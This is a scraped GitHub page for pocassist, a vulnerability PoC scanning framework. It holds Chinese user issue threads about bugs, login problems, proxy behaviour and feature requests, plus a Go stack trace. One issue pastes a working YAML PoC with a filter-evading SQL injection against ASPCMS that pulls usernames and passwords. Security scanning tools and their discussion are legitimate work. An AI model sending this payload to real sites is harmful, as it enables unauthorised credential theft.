- 🔭 this is jweny
- 👻 web security reseacher & developer
jweny / pocassist Goto Github PK
View Code? Open in Web Editor NEW傻瓜式漏洞PoC测试框架
Home Page: https://pocassist.jweny.top/
License: Apache License 2.0
傻瓜式漏洞PoC测试框架
Home Page: https://pocassist.jweny.top/
License: Apache License 2.0
这是半开源吗?
既然是一个漏洞测试框架,我想能不能实现一个提供go包给使用者使用,就是单独把漏洞测试的部分开放一个接口,供使用者导入到自己的go程序中,这样会更加方便,且有益于漏洞库的生态更新
Line 82 in 169c0d0
哈喽,我这边在测试sonar-cve-2020-27896漏洞。
不设置代理,返回包有乱码,系统扫描判断为“不存在漏洞”;而设置代理后,返回包数据正常,系统扫描判断为“存在漏洞”。是不是代表可能存在“设置代理会影响扫描结果”的情况?
PS:直接使用浏览器访问时,返回数据正常,sonar是存在漏洞的。
建议增加POC批评导入和导出的功能,便于POC文件增补;
application/x-www-form-urlencoded格式的POST数据,有换行的情况,需要strings.Replace(postdata, "\n", "\r\n", -1),否则发包不完整。
rate.NewLimiter()函数设置值有问题,第一个值应为MaxQps,第二个为瞬间并发数值。
发布版本是 Release 1.0.5
实际下载[pocassist_darwin_amd64.zip ,解压后运行发现提示版本是
1.0.4,是忘记修改了?
怎样支持script扫描
1、创建任务
2、选择自定义多个规则,选定多个weblogic相关poc
3、导入url列表文件,几百个左右的测试url
4、开始任务
这样开始任务后所有任务都会卡在running状态,但是流量监控中并没有出入站流量。
漏洞扫描不到,是因为exe版本不行,得自己搭建go服务器吗?
建议添加批量删除操作
建议增加批量导入xray功能
如果可以的话,建议增加nuclei 规则支持
导入yaml规则后,提示上传成功,但实际没有成功写入库中,举个例子
poc-yaml-aspcms-id-sqli.yml
name: poc-yaml-aspcms-id-sqli manual: true transport: http rules: r0: request: method: GET path: /plug/comment/commentList.asp?id=-1%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now(),null,1%20%20frmasterom%20{prefix}user follow_redirects: true expression: response.status == 200 && response.body.bcontains(bytes((string("line1"))))&&response.body.bcontains(bytes((string("line2")))) expression: r0() detail: author: xiao1hu links: - https://www.yuque.com/peiqiwiki/peiqi-poc-wiki/bg59x4 Affected Version: ASPCMS
优化建议
建议提升加载文件速度 测试了许多次 大约都在500条url或者1000条ip以上 导入txt都会卡死 服务器16g的内存直接满 也不算卡死 只能说 页面卡着不动。但是添加完之后 运行主程序的cmd会一直抛出报错的问题 并不会扫描
reverse.go中GetReverseResp函数没有考虑ceye响应503状态,导致503时返回true,尤其批量扫描时非常容易误报。
Line 32 in 169c0d0
linux部署出现问题,报错:cannot execute binary file,root登录,文件chmod 777,部署Linux64包,机器环境centos7.4 ,数据库用宝塔搭建,目前无法排错,希望给点建议;Windows本机 部署,没问题。
admin/admin2 最新的这个不对哎
db.Setup err: pocassist.db not exist, download at https://gi
thub.com/jweny/pocassistdb/releases
师傅您好,我想问下关于这个script的缺陷有修复吗,或者有啥思路可以分享一下吗
表哥,我在配置文件中没找到账号密码
建议添加批量删除任务与扫描结果
1、批量删除不存在漏洞的结果
2、存在漏洞结果支持批量导出
发现一个问题,单个运行POC可以扫出漏洞,如果运行所有的POC,能扫出漏洞的那个poc会出现
{"level":"error","time":"2022-04-20 14:56:28.136","linenum":"/root/croto/poc/rule/controller.go:173","msg":",POC: poc-yaml-Disclosure_dsStore [rule/controller.go: DoSingleRuleRequest error] dialing to the given TCP address timed out"}
猜测是
// Warning: DoTimeout does not terminate the request itself. The request will
// continue in the background and the response will be discarded.
// If requests take too long and the connection pool gets filled up please
// try using a Client and setting a ReadTimeout.
可是设置了ReadTimeout 还是会出现问题
不得其解???
按照官方文档提供U/P: admin/admin2无法登录pocassist demo界面
1.建议支持 nuclei模版,漏洞更新很快,漏洞质量也挺高,也是yaml形式,
controller.go中DoSingleRuleRequest函数有点问题,fixedFastReq.URI().Update(curPath)这里执行之后应该是丢掉了host头,我这里测试都是丢掉了然后报错no such host,需要手动fixedFastReq.URI().SetHost(curHost),不知道为什么你程序大部分都能正常发包而只有小部分POC才会报错。
批量扫描后发现漏洞不直观,建议增加保存结果功能
response.body.bcontains(b'admin') ==表示返回包中包含admin,如何写不包含admin
新手求教学
看到Release 1.0.5一直在期待更新~~
网站登录账号密码?不是admin/admin2
挂代理后,扫描ip+port,目标会连接不通
网络上也找不到了
报错信息:
2021/10/06 18:33:10 [Recovery] 2021/10/06 - 18:33:10 panic recovered:
runtime error: invalid memory address or nil pointer dereference
/usr/local/go/src/runtime/panic.go:221 (0x4516c6)
panicmem: panic(memoryError)
/usr/local/go/src/runtime/signal_unix.go:735 (0x451696)
sigpanic: panicmem()
/home/myh0st/tools/pocassist/api/routers/v1/scan/scan/scan.go:206 (0xc48573)
List: c.JSON(msg.ErrResp("插件加载失败" + err.Error()))
/root/go/pkg/mod/github.com/gin-gonic/[email protected]/context.go:165 (0x9f175e)
(*Context).Next: c.handlersc.index
/home/myh0st/tools/pocassist/api/middleware/jwt/jwt.go:47 (0x9f15d3)
JWT.func1: c.Next()
/root/go/pkg/mod/github.com/gin-gonic/[email protected]/context.go:165 (0x8b4981)
(*Context).Next: c.handlersc.index
/root/go/pkg/mod/github.com/gin-gonic/[email protected]/recovery.go:99 (0x8b496c)
CustomRecoveryWithWriter.func1: c.Next()
/root/go/pkg/mod/github.com/gin-gonic/[email protected]/context.go:165 (0x8b3be6)
(*Context).Next: c.handlersc.index
/root/go/pkg/mod/github.com/gin-gonic/[email protected]/logger.go:241 (0x8b3bc9)
LoggerWithConfig.func1: c.Next()
/root/go/pkg/mod/github.com/gin-gonic/[email protected]/context.go:165 (0x8b311d)
(*Context).Next: c.handlersc.index
/root/go/pkg/mod/github.com/gin-gonic/[email protected]/gin.go:489 (0x8b2da5)
(*Engine).handleHTTPRequest: c.Next()
/root/go/pkg/mod/github.com/gin-gonic/[email protected]/gin.go:445 (0x8b2904)
(*Engine).ServeHTTP: engine.handleHTTPRequest(c)
/usr/local/go/src/net/http/server.go:2878 (0x6a255a)
serverHandler.ServeHTTP: handler.ServeHTTP(rw, req)
/usr/local/go/src/net/http/server.go:1929 (0x69dc07)
(*conn).serve: serverHandler{c.server}.ServeHTTP(w, w.req)
/usr/local/go/src/runtime/asm_amd64.s:1581 (0x46c0c0)
goexit: BYTE $0x90 // NOP
how how how? plz
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.